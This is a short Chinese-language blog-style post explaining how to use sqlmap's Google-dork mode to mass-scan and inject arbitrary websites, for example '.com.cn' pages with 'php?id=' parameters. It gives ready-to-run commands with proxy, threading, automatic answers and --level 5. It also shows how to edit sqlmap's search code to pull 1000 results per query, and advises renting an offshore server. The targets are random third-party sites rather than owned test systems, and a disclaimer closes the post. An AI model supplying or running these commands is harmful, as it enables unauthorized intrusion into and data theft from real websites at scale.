說到批量滲透注入肯定大家都是非常感興趣的,對比了很多工具個人感覺都沒有sqlmap用得順手
本次滲透只需要兩個東西
1.一台香港的服務器
2.sqlmap
因為sqlmap自帶谷歌語法搜索引擎這里就比較香香,只需要配置一下sqlmap,睡一覺就好了,坐等結果
長護短說介紹一下如何使用sqlmap進行批量滲透
sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart
-g #谷歌搜索
–proxy #代理 (掛了ss就直接代理本地)
–threads #線程
–batch #自動回復
–answer “extending=N,follow=N,keep=N,exploit=n” #這個可以對一些特定的問題作出回答,在自動化注入中用
–smart #當有大量目標時,這個就只檢查基於錯誤的注入點
sqlmap 默認測試谷歌前100頁,增加頁面修改 sqlmap\lib\utils\search.py 中的第63行代碼
url = “https://www.google.com/search?”
url += “q=%s&” % urlencode(dork, convall=True)
url += “num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search”
url += “&start=%d” % ((gpage – 1) * 100)
注釋:
q:搜索關鍵詞
num:搜索頁面,默認為10,貌似最大是100,改為1000試試看
hl:默認問英文en,改為中文則是zh-CN,排除國外的網站
complete:全部結果
safe:是否開啟安全過濾
filter:是否過濾重復結果
btnG:正常搜索提交
start:開始頁面
修改 num 值為 1000
我個人比較喜歡這樣搞嘻嘻
python sqlmap.py -g ”inurl:index.php?id=1“ --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --level 5
再次聲明,只是技術分享,用於違法與作者無關